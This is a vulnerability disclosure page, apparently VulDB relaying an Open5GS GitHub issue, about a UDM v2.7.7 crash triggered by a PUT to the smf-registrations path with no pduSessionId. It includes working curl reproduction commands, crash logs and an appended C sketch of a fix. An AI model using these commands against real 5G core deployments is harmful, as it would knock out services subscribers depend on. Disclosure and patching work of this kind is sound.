Submit #806250: Open5gs UDM v2.7.7 Denial of Service

Title: Open5gs UDM v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

UDM crashes when it receives a `nudm-uecm` request for the `smf-registrations` collection without the final `{pduSessionId}` path segment.

In the top-level UDM SBI dispatcher, the `SMF_REGISTRATIONS` branch only creates or looks up a `udm_sess_t` when `resource.component[3]` exists. Immediately afterwards it unconditionally executes `ogs_assert(sess)`. That means a syntactically valid request to:

```text
/nudm-uecm/v1/{supi}/registrations/smf-registrations
```

reaches the `SMF_REGISTRATIONS` branch with `sess == NULL`, triggering a fatal assertion before the handler can return an HTTP error.

### Steps to reproduce

1. Start the official Open5GS v2.7.7 Docker deployment and make sure the UDM SBI endpoint is reachable. In my live setup the UDM endpoint was `http://10.33.33.6:80`.

2. Prime a UDM UE context for the test SUPI:

   ```bash
   curl --http2-prior-knowledge -sS -i \
     http://10.33.33.6/nudm-sdm/v2/imsi-001011234567891/am-data
   ```

3. Send a minimal valid `SmfRegistration` body to the collection path that omits the required `{pduSessionId}` segment:

   ```bash
   payload=$(python3 - <<'PY'
   import json
   body = {
       "smfInstanceId": "smf-test",
       "pduSessionId": 1,
       "singleNssai": {"sst": 1, "sd": "000001"},
       "dnn": "internet",
       "plmnId": {"mcc": "001", "mnc": "01"}
   }
   print(json.dumps(body, separators=(",", ":")))
   PY
   )
   curl --http2-prior-knowledge -v \
     -X PUT \
     http://10.33.33.6/nudm-uecm/v1/imsi-001011234567891/registrations/smf-registrations \
     -H 'content-type: application/json' \
     --data "$payload"
   ```

4. Check the UDM container state and logs:

   ```bash
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' udm
   docker logs --since 2026-04-10T19:26:55Z udm
   ```

### Logs

```shell
04/15 14:43:13.389: [app] INFO: Configuration: '/etc/open5gs/custom/udm.yaml' (../lib/app/ogs-init.c:144)
04/15 14:43:13.390: [app] INFO: File Logging: '/var/log/open5gs/udm.log' (../lib/app/ogs-init.c:147)
04/15 14:43:13.392: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451)
04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-ueau] (../lib/sbi/context.c:1985)
04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-uecm] (../lib/sbi/context.c:1985)
04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-sdm] (../lib/sbi/context.c:1985)
04/15 14:43:13.393: [sbi] INFO: nghttp2_server() [http://udm.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434)
04/15 14:43:13.393: [app] INFO: UDM initialize...done (../src/udm/app.c:31)
04/15 14:43:13.394: [sbi] INFO: [6e3f9f58-38d9-41f1-874b-298767132c4d] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341)
04/15 14:43:13.396: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/15 14:43:13.396: [sbi] INFO: [6e404872-38d9-41f1-83d3-81714110b74b] Subscription created until 2026-04-16T14:43:13.396167+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/15 14:43:13.396: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/15 14:43:13.396: [sbi] INFO: [6e404bec-38d9-41f1-83d3-81714110b74b] Subscription created until 2026-04-16T14:43:13.396239+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/15 14:43:13.403: [sbi] INFO: [a9996ea0-38d7-41f1-b953-63be20b73eef] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/15 14:43:13.403: [sbi] INFO: [UDR] NFInstance associated [a9996ea0-38d7-41f1-b953-63be20b73eef] (../lib/sbi/context.c:2441)
04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udr.open5gs.org:0] (../lib/sbi/context.c:2446)
04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../lib/sbi/context.c:2446)
04/15 14:43:13.403: [sbi] INFO: [nudr-dr] NFService associated [a999de94-38d7-41f1-b953-63be20b73eef] (../lib/sbi/context.c:2109)
04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udr.open5gs.org:0] (../lib/sbi/context.c:2111)
04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../lib/sbi/context.c:2111)
04/15 14:43:20.933: [sbi] INFO: [a9996ea0-38d7-41f1-b953-63be20b73eef] Setup NF Instance [type:UDR] (../lib/sbi/path.c:307)
04/15 14:43:20.975: [udm] FATAL: udm_state_operational: Assertion `sess' failed. (../src/udm/udm-sm.c:235)
04/15 14:43:20.976: [core] FATAL: backtrace() returned 7 addresses (../lib/core/ogs-abort.c:37)
open5gs-udmd(+0xeeec) [0x5602d034deec]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7f3e25b63abc]
open5gs-udmd(+0x6243) [0x5602d0345243]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7f3e25b53b4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f3e25248ac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f3e252d9a84]
```

### Expected behaviour

UDM should reject the malformed request with a normal `400` or `404` response instead of aborting the process.

### Observed Behaviour

The HTTP/2 stream aborts and the UDM process exits with code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4419
User: FrankyLin (UID 94345)
Submission: 16/04/2026 05:38 (2 months ago)
Moderation: 04/05/2026 17:50 (19 days later)
Status: Accepted
VulDB entry: 360977 [Open5GS up to 2.7.7 smf-registrations Endpoint /src/udm/udm-sm.c udm_state_operational denial of service]
Points: 20
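
The following is an added example, not Open5GS code and not part of the submission: a minimal C sketch of the check the report's "Expected behaviour" asks for, where a missing or malformed `{pduSessionId}` segment yields an HTTP error status instead of reaching an assertion. The names `split_resource` and `route_smf_registration`, the `204`/`414` return values and the 0..255 range for the identifier are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_COMPONENTS 8

/* Hypothetical stand-in for the resource components that follow the
 * "/nudm-uecm/v1/" prefix: [0]=supi [1]="registrations"
 * [2]="smf-registrations" [3]=pduSessionId (absent on the collection path). */
static int split_resource(char *path, char *component[MAX_COMPONENTS])
{
    int n = 0;
    memset(component, 0, sizeof(char *) * MAX_COMPONENTS);
    for (char *tok = strtok(path, "/"); tok && n < MAX_COMPONENTS;
         tok = strtok(NULL, "/"))
        component[n++] = tok;
    return n;
}

/* Returns the HTTP status to answer with; 204 means "segment is valid,
 * the per-session lookup may run". No path reaches an assertion. */
int route_smf_registration(const char *resource_path)
{
    char buf[256], *component[MAX_COMPONENTS], *end = NULL;
    long psi;

    if (strlen(resource_path) >= sizeof(buf))
        return 414;                  /* path too long for this sketch */
    strcpy(buf, resource_path);
    if (split_resource(buf, component) < 3 ||
        strcmp(component[1], "registrations") != 0 ||
        strcmp(component[2], "smf-registrations") != 0)
        return 404;                  /* some other resource */
    if (!component[3])
        return 400;                  /* the case from this report */
    psi = strtol(component[3], &end, 10);
    if (*end != '\0' || psi < 0 || psi > 255)   /* assumed 0..255 range */
        return 400;
    return 204;
}

int main(void)
{
    /* Constructed inputs modelled on the paths quoted on this page. */
    const char *base = "imsi-001011234567891/registrations/smf-registrations";
    char with_id[128];
    snprintf(with_id, sizeof(with_id), "%s/1", base);
    printf("%d %d\n", route_smf_registration(base),
           route_smf_registration(with_id));
    return 0;
}
```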
